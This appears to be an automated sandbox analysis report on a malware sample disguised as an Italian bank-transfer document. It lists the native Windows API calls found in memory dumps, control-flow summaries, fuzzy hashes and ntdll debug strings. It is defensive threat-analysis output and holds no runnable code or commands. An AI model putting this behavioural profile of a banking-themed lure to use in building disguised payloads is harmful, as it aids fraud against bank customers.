                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: b7c82dd204dac21fe647372479e01c61b9d40f16f17e88d6db4b886f29bcc5fb
                                  • Instruction ID: 159411f34822f584cba13318e380b0e6d4baf2e06112cf03047d7a0e9d554c69
                                  • Opcode Fuzzy Hash: b7c82dd204dac21fe647372479e01c61b9d40f16f17e88d6db4b886f29bcc5fb
                                  • Instruction Fuzzy Hash: 4401EFB2201208AFCB48CF88CC81EEB37E9AF8C754F158609FA0DD7241D630E8518BA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 243 41a360-41a376 244 41a37c-41a3b1 NtCreateFile 243->244 245 41a377 call 41af60 243->245 245->244
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 258 41a490-41a4b9 call 41af60 NtClose
                                  APIs
                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 6EA
                                  • API String ID: 1279760036-1400015478

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 237 41a7c2-41a7cb 238 41a7cd-41a7ea call 41af60 237->238 239 41a7ac-41a7c0 237->239 241 41a7ef-41a804 LookupPrivilegeValueW 238->241
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 249 41a662-41a687 call 41af60 251 41a68c-41a6a1 RtlFreeHeap 249->251
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 252 41a670-41a686 253 41a68c-41a6a1 RtlFreeHeap 252->253 254 41a687 call 41af60 252->254 254->253
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 41a7d0-41a7e9 256 41a7ef-41a804 LookupPrivilegeValueW 255->256 257 41a7ea call 41af60 255->257 257->256
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Strings
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                  • a NULL pointer, xrefs: 01178F90
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                  • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                  • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                  • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                  • The instruction at %p tried to %s , xrefs: 01178F66
                                  • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                  • The resource is owned shared by %d threads, xrefs: 01178E2E
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                  • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                  • The critical section is owned by thread %p., xrefs: 01178E69
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                  • read from, xrefs: 01178F5D, 01178F62
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                  • write to, xrefs: 01178F56
                                  • an invalid address, %p, xrefs: 01178F7F
                                  • *** then kb to get the faulting stack, xrefs: 01178FCC
                                  • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                  • This failed because of error %Ix., xrefs: 01178EF6
                                  • *** enter .cxr %p for the context, xrefs: 01178FBD
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  Strings
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                  • corrupted critical section, xrefs: 011354C2
                                  • Critical section address., xrefs: 01135502
                                  • double initialized or corrupted critical section, xrefs: 01135508
                                  • Critical section debug info address, xrefs: 0113541F, 0113552E
                                  • Thread identifier, xrefs: 0113553A
                                  • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                  • undeleted critical section in freed memory, xrefs: 0113542B
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                  • Invalid debug info address of this critical section, xrefs: 011354B6
                                  • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                  • 8, xrefs: 011352E3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  Strings
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                  • @, xrefs: 0113259B
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-3197712848
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                  • API String ID: 0-664215390
                                  Strings
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                  • HandleTraces, xrefs: 01148C8F
                                  • VerifierDebug, xrefs: 01148CA5
                                  • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                  • VerifierDlls, xrefs: 01148CBD
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                  • VerifierFlags, xrefs: 01148C50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  Strings
                                  • ***Exception thrown within loader***, xrefs: 01144E27
                                  • Execute '.cxr %p' to dump context, xrefs: 01144EB1
                                  • LdrpGenericExceptionFilter, xrefs: 01144DFC
                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01144DF5
                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01144E38
                                  • minkernel\ntdll\ldrutil.c, xrefs: 01144E06
                                  • LdrpProtectedCopyMemory, xrefs: 01144DF4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-2973941816
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  Strings
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
                                  • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                  • apphelp.dll, xrefs: 010B6496
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                  • Instruction ID: b6ecafaff20d3bfd58c411c607e5d39bc88ef73859be617b9c3583112308b33e
                                  • Opcode Fuzzy Hash: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                  • Instruction Fuzzy Hash: CE51E3712183089FD728DF24D891BABB7E8FB84748F40092DF5E59B194D731E944CB92
                                  Strings
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                  • SXS: %s() passed the empty activation context, xrefs: 01132165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                  • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                  • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                  • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                  • LdrpInitializeProcess, xrefs: 010FC6C4
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  APIs
                                    • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                  • @, xrefs: 010F8591
                                  • LdrpInitializeProcess, xrefs: 010F8422
